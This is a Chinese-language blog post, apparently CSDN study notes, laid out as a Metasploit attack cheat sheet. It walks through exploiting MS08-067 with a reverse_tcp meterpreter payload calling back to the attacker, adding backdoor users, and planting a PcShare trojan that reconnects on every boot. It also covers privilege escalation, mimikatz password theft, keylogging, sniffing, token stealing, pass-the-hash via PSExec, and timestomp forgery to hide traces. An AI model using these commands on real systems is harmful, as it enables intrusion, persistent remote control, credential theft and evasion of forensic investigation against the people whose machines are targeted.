msf使用

msf

  1. 云服务器输入msfconsole,进入msf
  2. search 查找需要模块
  3. use 该模块
  4. show options查看需要配置内容
命令行输入 connect www.baidu.com 80
连接百度的80端口
back退出,返回400
应该表示是通的
  1. jobs 显示和管理作业
  2. kill 进程
  3. loadpath 加载模块的路径
  4. load 加载插件
  5. route 查看会话路由信息
系统漏洞利用过程 ~ ms08067
10. 天镜,nessuss,极光扫描器进行漏扫
11. 根据漏扫结果,去msf根据漏洞编号,查找漏洞利用工具
12. use工具编号
13. info查看工具相关说明,对哪些操作系统有影响(有个列表,带编号)
14. show options
15.  set rhosts xx.xxx.xxx.xx
16. set rport 一般不需要设置端口,默认了
17. 配置muma set payload windows/meterpreter/reverse_tcp
18. 设置本地监听  set lhost
19. set lport
20. set target 2(受影响操作系统的编号
21. exploit
攻击失败,可以再run一次试试
进入meterpreter>命令行,说明攻击成功,进入木马模式
shell 进入对方命令行
net user 123 123 /add 新建用户
exit 回到meterpreter>


想要对方图形化界面,需要开3389,kali不支持,需要单独传个马过去

baidu

木ma两种连接方式
22. 正向(会被防火墙拦截
23. 反向(监听(大多数人使用
攻击自己的时候,要关防火墙
windows/meterpreter/reverse_tcp_dns 穿墙比较厉害

后期攻击

upload 文件名 目标地址
上传本机文件到目标主机
-r 参数 递归

pcshare文件,是驱动级别的马
使用pcshare,生成出一个马123.exe放在mnt下,传到对方windows下的c盘
upload //mnt//123.exe c:\\123.exe
execute -f c://123.exe 强制执行
在pcshare发现对方已上线。只要对方一开机就会自动上线
使用pashare图形化界面对对方电脑进行控制《文件管理《截屏《上传《音视频录制。。。。。。

download 文件名 文件被保存的地址

meterpreter> execute -f cmd -c 在对方主机创建新的cmd通道
ps 查看进程
getsystem 提权本地系统,提到windows最高system权限
getuid 查看当前权限

 meterpreter模式下
 想使用msf模块内容
 可用background命令,后台执行
 
**脚本提权**
 use exploit/windows/local(放的是本地提权脚本)/bypassuac
 已与对方建立连接状态下session -i查看目前只有一个session,编号1
新建会话(成功了,就是system用户的会话): 直接set session 2
 

## 内核漏洞提权
session -i 1 进入会话,进入meterpreter模式

提权成功后—》扩大战果–获取管理员账号密码
mimikatz抓取密码
在meterpreter模式下load mimikatz
wdigest 获取对方主机用户密码

开远程

meterpreter>run getgui -e 开启远程桌面
run getgui -u 123 -p 123 创建用户
run getgui -f 6661 -e 3389端口转发到6661

  1. 键盘记录
    meterpreter>keyscan_start 开始
  2. sniffer抓包
  • 抓对方电脑进出流量的包*
  • use sniffer
    sniffer_interfaces 查看网卡
    sniffer_start 2 选择网卡,开始抓包
  1. 注册表操作
    nc后门
  2. 令牌操纵
    incognito 假冒令牌
    (普通用户权限,可通过此方法)
    use incognito
    list_token -u 查看可用token,显示一堆用户名
    impersonate_token '要伪造的用户名‘
    rev2self 返回原始token
窃取令牌(提权)
 1.   先ps
 2. steal_token《pid值》   从指定进程窃取token
 3. drop_steal 删除窃取的token
  1. PSExec哈希传递
    windows密码文件在C:\WINDOWS\system32\config\sam

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set lhost
set lport
set rhost
set SMBUser Administrator
set SMBPass 密码hash值
exploit

  1. timestomp 伪造时间戳
    meterpreter>timestomp -v c://123.txt 查看时间戳
    timestomp c://123.txt -f c://321.txt 把321的时间戳赋值给123

辅助模块

  1. whois 信息探测
    msf>whois www.baidu.com

  2. 查找邮箱
    use auxiliary/gather/search_email_collector
    guangoogle

  3. dns 枚举
    use auxiliary/gather/enum_dns
    设置顶级域名,不加www

内置nmap
msf>nmap -sV 192.168.11.101

syn扫描
use auxiliary/scanner/portscan/syn
set rhosts
set thread
run

tcp扫描

use auxiliary/scanner/portscan/tcp

服务版本信息探测

  • smb 版本 use auxiliary/scanner/smb/smb_version
  • ssh 版本 use auxiliary/scanner/ssh/ssh_version
  • ftp 版本
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值